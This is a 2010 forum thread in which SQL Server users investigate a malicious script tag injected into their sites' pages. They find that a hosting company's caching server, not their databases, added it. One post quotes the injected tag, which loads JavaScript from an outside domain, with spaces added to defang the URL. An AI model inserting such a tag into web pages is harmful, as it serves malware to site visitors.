Please start any new threads on our new
site at https://forums.sqlteam.com. We've got lots of great SQL Server
experts to answer whatever question you can come up with.
| Author |
Topic |
|
rrayfield
Starting Member
4 Posts |
 Posted - 2010-09-17 : 13:00:20
|
| OK, So my sites are down and this annoying script tag is posted at the top of pages with database connections. trying to load a javascript from jujud.9966.org. On other research I have realized that this problem is not just with one database instance on the server. It has seemed to infected all of them (9). So the different sites I go to also have this same script that are using the same database instance. I have dug through logs and searched the database for anything related to that script to remove it. There has been no data modified in the database on the tables I have created that I can tell. Where should I look to remove this thing? It killing my clients. I have used this searching for the word script but it returns nothing. http://vyaskn.tripod.com/search_all_columns_in_all_tables.htm Any help with this is highly appreciated!ThanksRyan |
|
|
rrayfield
Starting Member
4 Posts |
Posted - 2010-09-17 : 13:19:13
|
| this is the script it adds <script language=javascript src=h ttp: // jujud. 9966.o rg/ index. htm></script> , AVG picks it right up, But i cannot tell what is adding it to the page. Its driving me nutts...[EDIT by spirit1]added spaces in url to make it unclickable |
 |
|
|
Kristen
Test
22859 Posts |
Posted - 2010-09-17 : 13:25:53
|
Infection of one database may have been able to spring-board to infect the others, so it may have started in another database on that server. If you are not in control of all the databases (e.g. you are using shared hosting) then you may be the innocent victim - although if that's the case then the security on that server stinks  If that's not the case then there is something in your application that has allowed un-sanitised data to be passed to SQL, and you need to fix that before you put the application back upright (otherwise the Injectors will be back again tomorrow ...)If you can't find the data in the database it might not be there. Maybe they just hacked the web site and changed the HTML / web pages?It might also be that the script command is not there verbatim - it might be obfuscated or PACKed or somesuch.Perhaps restore from Backup (from shortly prior to the attach) to a Temporary database and use a tool like RedGate Compare to see what is different between the Temp database and your Live database. That will find all records legitimated changed, of course, but will show you anything illegitimately changed too - although it might be like looking for needle in haystack.If <SCRIPT> stuff has been injected into fields you will have to restore from earlier backup - the injection will have wrecked the data that was in those field. If you are using Full Recovery Model you will be able to roll forwards to just before the attack occurred which, if it was spotted promptly, will mean you lose very little data. |
|
|
|
Kristen
Test
22859 Posts |
Posted - 2010-09-17 : 13:26:58
|
| Can you edit that link so that no one can accidentally click on it please. Otherwise you are going to spoil someone else's day too ... |
|
|
|
rrayfield
Starting Member
4 Posts |
Posted - 2010-09-17 : 13:32:08
|
| Kristen, Thanks for the info. I have access to all the dbs. I only have a backup for one of the databases, and it gets overwritten everynight, so Last night the good copy was probably over written with the bad. The weird thing about it is that* All my sites are datadriven, and the link seems to come and go, it's there %50 of the time.* Ther are no HTML files to edit.* If a page makes any call to the DB it has the potential to get infected no matter what table its looking at?This system has been in place for 3 years and has never had an issue like this.I am going to try the compair program. Could this be hiding in some system pasrt of the db that then attaches itself to all select statememts? |
|
|
|
rrayfield
Starting Member
4 Posts |
Posted - 2010-09-17 : 13:40:24
|
| upon further review... I may be looking in the wron place. I have noticed that I went to a page on the site that makes no Database calls and the link is still added. This file does make xml calls, but the xml is easy to check and it was clean. This is an ASP.net dynamic page, there is no hard coded stuff in there, it is all built from code. It seems like IIS may be hijacked? |
|
|
|
razorsharp
Starting Member
2 Posts |
Posted - 2010-09-17 : 17:59:40
|
| I am having the same problem. This is what I can tell you so far:1. Static HTML pages will even have the injected script.2. There is NO WHERE in my database that this script exists.3. NO changes have been made to this server in several days but this problem started this morning.4. It would appear that it is IIS or there might be a caching server between my server and the "outside world" that is affected.I am in the process of talking to Microsoft to see what the problem is. I am hoping that it is not a zero day. |
|
|
|
razorsharp
Starting Member
2 Posts |
Posted - 2010-09-17 : 20:29:37
|
| IT WASN'T MY SERVER!!!After spending the ENTIRE DAY investigating this (including Microsoft helping out too) the problem was a caching server at the hosting company that was injecting the script tag into the response AFTER my server sent it.This was proven by capturing the network packets leaving the server's network card and analyzing the log file with Wire Shark. NO WHERE in the log was there evidence that the malicious script came from my server.I need a drink (well, lots of them)! |
|
|
|
|
|
|
|
|
SQL Injection, I am infected